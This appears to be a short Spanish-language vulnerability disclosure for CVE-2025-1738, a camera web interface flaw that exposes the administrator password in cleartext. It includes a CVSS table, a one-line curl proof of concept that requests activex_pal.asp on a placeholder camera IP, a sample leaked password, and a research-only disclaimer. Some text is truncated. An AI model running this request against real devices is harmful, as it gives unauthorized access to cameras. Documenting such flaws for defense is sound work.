
Descubrimiento de día cero CVE-2025-1738
Tras la divulgación responsable, se asignaron dos CVEs oficiales.
| CVE | CVSS v3.1 | Puntuación | CWE | Tipo |
|---|---|---|---|---|
| CVE-2025-1738 | AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N | 6.2 | CWE-598 | Exposición de contraseña en texto claro |
Cualquier usuario local puede recuperar la contraseña de administrador en texto plano sin necesidad de autenticación previa.
curl -u admin:whatever http://<CAMERA_IP>:<PORT> --request-target en/player/activex_pal.asp
...password=unguessable123!...
La contraseña de administrador se devuelve en texto claro dentro del cuerpo de la respuesta.
activex_pal.asp y mblogin.asp.Este repositorio es solo para investigación de seguridad educativa y autorizada. Los autores no se hacen responsables de ningún uso indebido. Siempre obtenga permiso explícito antes de probar cualquier dispositivo.